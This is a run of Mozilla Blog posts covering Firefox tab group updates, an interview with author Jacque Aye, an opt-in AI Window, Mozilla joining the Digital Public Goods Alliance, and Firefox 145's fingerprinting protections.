You can read the full strategy document here. Next up in this series: Building A LAMP Stack for AI. Followed by: A Double Bottom Line for Tech and The Mozilla Manifesto in the Era of AI.
The post Rewiring Mozilla: Doing for AI what we did for the web appeared first on The Mozilla Blog.
Firefox tab groups just got an upgrade, thanks to your feedback
Tab groups have become one of Firefox’s most loved ways to stay organized — over 18 million people have used the feature since it launched earlier this year. Since then, we’ve been listening closely to feedback from the Mozilla Connect community to make this long-awaited feature even more helpful.
We’ve just concluded a round of highly requested tab groups updates that make it easier than ever to stay focused, organized, and productive. Check out what we’ve been up to, and if you haven’t tried tab groups yet, here’s a helpful starting guide.
Preview tab group contents on hoverStarting in Firefox 145, you can peek inside a group without expanding it. Whether you’re checking a stash of tabs set aside for deep research or quickly scanning a group to find the right meeting notes doc, hover previews give you the context you need — instantly.
Keep the active tab visible in a collapsed group — and drag tabs into itSince Firefox 142, when you collapse a group, the tab you’re working in remains visible. It’s a small but mighty improvement that reduces interruptions. And, starting in Firefox 143, you can drag a tab directly into a collapsed group without expanding it. It’s a quick, intuitive way to stay organized while reducing on-screen clutter.
Each of these ideas came from your feedback on Mozilla Connect. We’re grateful for your engagement, creativity, and patience as our team works to improve Tab Groups.
What’s next for tab groupsWe’ve got a big, healthy stash of great ideas and suggestions to explore, but we’d love to hear more from you on two areas of long-term interest:
- Improving the usefulness and ease of use of saved tab groups. We’re curious how you’re using them and how we can make the experience more helpful to you. What benefits do they bring to your workflow compared to bookmarks?
- Workspaces. Some of you have requested a way to separate contexts by creating workspaces — sets of tabs and tab groups that are entirely isolated from each other, yet remain available within a single browser window. We are curious about your workspace use cases and where context separation via window management or profiles doesn’t meet your workflow needs. Is collaboration an important feature of the workspaces for you?
Have ideas and suggestions? Let us know in this Mozilla Connect thread!
Take control of your internet Download Firefox
The post Firefox tab groups just got an upgrade, thanks to your feedback appeared first on The Mozilla Blog.
The writer behind ‘Diary of a Sad Black Woman’ on making space for feelings online
Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and how they would design their own corner of the web.
We caught up with Jacque Aye, the author behind “Diary of a Sad Black Woman.” She talks about blogging culture, writing fiction for “perpetually sighing adults” and Lily Allen’s new album.
What is an internet deep dive that you can’t wait to jump back into?Right now, I’m deep diving into Lily Allen’s newest album! Not for the gossip, although there’s plenty of that to dive into, but for the psychology behind it all. I appreciate creatives who share so vulnerably but in nuanced and honest ways. Sharing experiences is what makes us feel human, I think. The way she outlined falling in love, losing herself, struggling with insecurities, and feeling numb was so relatable to me. Now, would I share as many details? Probably not. But I do feel her.
What was the first online community you engaged with?Blogger. I was definitely a Blogger baby, and I used to share my thoughts and outfits there, the same way I currently share on Substack. I sometimes miss those times and my little oversharing community. Most people didn’t really have personal brands then, so everything felt more authentic, anonymous and free.
What is the one tab you always regret closing?Substack! I always find the coolest articles, save the tab, then completely forget I meant to read it, ahhhh.
What can you not stop talking about on the internet right now?I post about my books online to an obsessive and almost alarming degree, ha. I’ve been going on and on about my weird, whimsical, and woeful novels, and people seem to resonate with that. I describe my work as Lemony Snicket meets a Boots Riley movie, but for perpetually sighing adults. I also never, ever shut up about my feelings. You can even read my diary online. For free. On Substack.
If you could create your own corner of the internet, what would it look like?I feel super lucky to have my own little corner of the internet! In my corner, we love wearing cute outfits, listening to sad girl music, watching Tim Burton movies, and reading about flawed women going through absurd trials.
What articles and/or videos are you waiting to read/watch right now?I can’t wait to settle in and watch Knights of Guinevere! It looks so, so good, and I adore the creator.
What is your favorite corner of the internet?This will seem so random, but right now, besides Substack, I’m really loving Threads. People are so vulnerable on there, and so willing to share personal stories and ask for help and advice. I love any space where I can express the full range of my feelings… and also share my books and outfits, ha.
How do you imagine the next version of the internet supporting creators who lead with emotion and care?I really hope the next version of the internet reverts back to the days of Blogger and Tumblr. Where people could design their spaces how they see fit, integrate music and spew their hearts out without all the judgment.
Jacque Aye is an author and writes “Diary of a Sad Black Woman” on Substack. As a woman who suffers from depression and social anxiety, she’s made it her mission to candidly share her experiences with the hopes of helping others dealing with the same. This extends into her fiction work, where she pens tales about woeful women trying their best, with a surrealist, magical touch. Inspired by authors like Haruki Murakami, Sayaka Murata, and Lemony Snicket, Jacque’s stories are dark, magical, and humorous with a hint… well, a bunch… of absurdity.
The post The writer behind ‘Diary of a Sad Black Woman’ on making space for feelings online appeared first on The Mozilla Blog.
Introducing AI, the Firefox way: A look at what we’re working on and how you can help shape it
We recently shared how we are approaching AI in Firefox — with user choice and openness as our guiding principles. That’s because we believe AI should be built like the internet — open, accessible, and driven by choice — so that users and the developers helping to build it can use it as they wish, help shape it and truly benefit from it.
In Firefox, you’ll never be locked into one ecosystem or have AI forced into your browsing experience. You decide when, how or whether to use it at all. You’ve already seen this approach in action through some of our latest features like the AI chatbot in the sidebar for desktop or Shake to Summarize on iOS.
Now, we’re excited to invite you to help shape the work on our next innovation: an AI Window. It’s a new, intelligent and user-controlled space we’re building in Firefox that lets you chat with an AI assistant and get help while you browse, all on your terms. Completely opt-in, you have full control, and if you try it and find it’s not for you, you can choose to switch it off.
As always, we’re building in the open — and we want to build this with you. Starting today, you can sign up to receive updates on our AI Window and be among the first to try it and give us feedback.
AI Window: Built for choice & control Join the waitlist
We’re building a better browser, not an agenda
We see a lot of promise in AI browser features making your online experience smoother, more helpful, and free from the everyday disruptions that break your flow. But browsers made by AI companies ask you to make a hard choice — either use AI all the time or don’t use it at all.
We’re focused on making the best browser, which means recognizing that everyone has different needs. For some, AI is part of everyday life. For others, it’s useful only occasionally. And many are simply curious about what it can offer, but unsure where to start.
Regardless of your choice, with Firefox, you’re in control.
You can continue using Firefox as you always have for the most customizable experience, or switch from classic to Private Window for the most private browsing experience. And now, with AI Window, you have the option to opt in to our most intelligent and personalized experience yet — providing you with new ways to interact with the web.
Why is investing in AI important for Firefox?With AI becoming a more widely adopted interface to the web, the principles of transparency, accountability, and respect for user agency are critical to keeping it free, open, and accessible to all. As an independent browser, we are well positioned to uphold these principles.
While others are building AI experiences that keep you locked in a conversational loop, we see a different path — one where AI serves as a trusted companion, enhancing your browsing experience and guiding you outward to the broader web.
We believe standing still while technology moves forward doesn’t benefit the web or humanity. That’s why we see it as our responsibility to shape how AI integrates into the web — in ways that protect and give people more choice, not less.
Help us shape the future of the webOur success has always been driven by our community of users and developers, and we’ll continue to rely on you as we explore how AI can serve the web — without ever losing focus on our commitment to build what matters most to our users: a Firefox that remains fast, secure and private.
Join us by contributing to open-source projects and sharing your ideas on Mozilla Connect.
The post Introducing AI, the Firefox way: A look at what we’re working on and how you can help shape it appeared first on The Mozilla Blog.
Mozilla joins the Digital Public Goods Alliance, championing open source to drive global progress
Today, Mozilla is thrilled to join the Digital Public Goods Alliance (DPGA) as its newest member. The DPGA is a UN-backed initiative that seeks to advance open technologies and ensure that technology is put to use in the public interest and serves everyone, everywhere — like Mozilla’s Common Voice, which has been recognized as a Digital Public Good (DPG). This announcement comes on the heels of a big year of digital policy-making globally, where Mozilla has been at the forefront in advocating for open source AI across Europe, North America and the UK.
The DPGA is a multi-stakeholder initiative with a mission to accelerate the attainment of the Sustainable Development Goals (SDGs) “by facilitating the discovery, development, use of and investment in digital public goods.” Digital public goods means open-source technology, open data, open and transparent AI models, open standards and open content that adhere to privacy, the do no harm principle, and other best practices.
This is deeply aligned with Mozilla’s mission. It creates a natural opportunity for collaboration and shared advocacy in the open ecosystem, with allies and like-minded builders from across the globe. As part of the DPGA’s Annual Roadmap for 2025, Mozilla will focus on three work streams:
- Promoting DPGs in the Open Source Ecosystem: Mozilla has long championed open-source, public-interest technology as an alternative to profit-driven development. Through global advocacy, policy engagement, and research, we highlight the societal and economic value of open-source, especially in AI. Through our work in the DPGA,, we’ll continue pushing for better enabling conditions and funding opportunities for open source, public interest technology.
- DPGs and Digital Commons: Mozilla develops and maintains a range of open source projects through our various entities. These include Common Voice, a digital public good with over 33,000 hours of multilingual voice data, and applications like the Firefox web browser and Thunderbird email client. Mozilla also supports open-source AI through our product work, including by Mozilla.ai, and our venture fund, Mozilla Ventures.
- Funding Open Source & Public Interest Technology: Grounded by our own open source roots, Mozilla will continue to fund open source technologies that help to untangle thorny sociotechnical issues. We’ve fueled a broad and impactful portfolio of technical projects. Beginning in the Fall of 2025, we will introduce our latest grantmaking program: an incubator that will help community-driven projects find “product-community fit” in order to attain long-term sustainability.
We hope to use our membership to share research, tooling, and perspectives with a like-minded audience and partner with the DPGA’s diverse community of builders and allies.
“Open source AI and open data aren’t just about tech,” said Mark Surman, president of Mozilla. “They’re about access to technology and progress for people everywhere. As a double bottom line, mission-driven enterprise, Mozilla is proud to be part of the DPGA and excited to work toward our joint mission of advancing open-source, trustworthy technology that puts people first.”
To learn more about DPGA, visit https://digitalpublicgoods.net.
The post Mozilla joins the Digital Public Goods Alliance, championing open source to drive global progress appeared first on The Mozilla Blog.
Firefox expands fingerprint protections: advancing towards a more private web
With Firefox 145, we’re rolling out major privacy upgrades that take on browser fingerprinting — a pervasive and hidden tracking technique that lets websites identify you even when cookies are blocked or you’re in private browsing. These protections build on Mozilla’s long-term goal of building a healthier, transparent and privacy-preserving web ecosystem.
Fingerprinting builds a secret digital ID of you by collecting subtle details of your setup — ranging from your time zone to your operating system settings — that together create a “fingerprint” identifiable across websites and across browser sessions. Having a unique fingerprint means fingerprinters can continuously identify you invisibly, allowing bad actors to track you without your knowledge or consent. Online fingerprinting is able to track you for months, even when you use any browser’s private browsing mode.
Protecting people’s privacy has always been core to Firefox. Since 2020, Firefox’s built-in Enhanced Tracking Protection (ETP) has blocked known trackers and other invasive practices, while features like Total Cookie Protection and now expanded fingerprinting defenses demonstrate a broader goal: prioritizing your online freedom through innovative privacy-by-design. Since 2021, Firefox has been incrementally enhancing anti-fingerprinting protections targeting the most common pieces of information collected for suspected fingerprinting uses.
Today, we are excited to announce the completion of the second phase of defenses against fingerprinters that linger across all your browsing but aren’t in the known tracker lists. With these fingerprinting protections, the amount of Firefox users trackable by fingerprinters is reduced by half.
How we built stronger defensesDrawing from a global analysis of how real people’s browsers can be fingerprinted, Mozilla has developed new, unique and powerful defenses against real-world fingerprinting techniques. Firefox is the first browser with this level of insight into fingerprinting and the most effective deployed defenses to reduce it. Like Total Cookie Protection, one of our most innovative privacy features, these new defenses are debuting in Private Browsing Mode and ETP Strict mode initially, while we work to enable them by default.
How Firefox protects you
These fingerprinting protections work on multiple layers, building on Firefox’s already robust privacy features. For example, Firefox has long blocked known tracking and fingerprinting scripts as part of its Enhanced Tracking Protection.
Beyond blocking trackers, Firefox also limits the information it makes available to websites — a privacy-by-design approach — that preemptively shrinks your fingerprint. Browsers provide a way for websites to ask for information that enables legitimate website features, e.g. your graphics hardware information, which allows sites to optimize games for your computer. But trackers can also ask for that information, for no other reason than to help build a fingerprint of your browser and track you across the web.
Since 2021, Firefox has been incrementally advancing fingerprinting protections, covering the most pervasive fingerprinting techniques. These include things like how your graphics card draws images, which fonts your computer has, and even tiny differences in how it performs math. The first phase plugged the biggest and most-common leaks of fingerprinting information.
Recent Firefox releases have tackled the next-largest leaks of user information used by online fingerprinters. This ranges from strengthening the font protections to preventing websites from getting to know your hardware details like the number of cores your processor has, the number of simultaneous fingers your touchscreen supports, and the dimensions of your dock or taskbar. The full list of detailed protections is available in our documentation.
Our research shows these improvements cut the percentage of users seen as unique by almost half.
Firefox’s new protections are a balance of disrupting fingerprinters while maintaining web usability. More aggressive fingerprinting blocking might sound better, but is guaranteed to break legitimate website features. For instance, calendar, scheduling, and conferencing tools legitimately need your real time zone. Firefox’s approach is to target the most leaky fingerprinting vectors (the tricks and scripts used by trackers) while preserving functionality many sites need to work normally. The end result is a set of layered defenses that significantly reduce tracking without downgrading your browsing experience. More details are available about both the specific behaviors and how to recognize a problem on a site and disable protections for that site alone, so you always stay in control. The goal: strong privacy protections that don’t get in your way.
What’s next for your privacyIf you open a Private Browsing window or use ETP Strict mode, Firefox is already working behind the scenes to make you harder to track. The latest phase of Firefox’s fingerprinting protections marks an important milestone in our mission to deliver: smart privacy protections that work automatically — no further extensions or configurations needed. As we head into the future, Firefox remains committed to fighting for your privacy, so you get to enjoy the web on your terms. Upgrade to the latest Firefox and take back control of your privacy.
Take control of your internet Download Firefox
The post Firefox expands fingerprint protections: advancing towards a more private web appeared first on The Mozilla Blog.
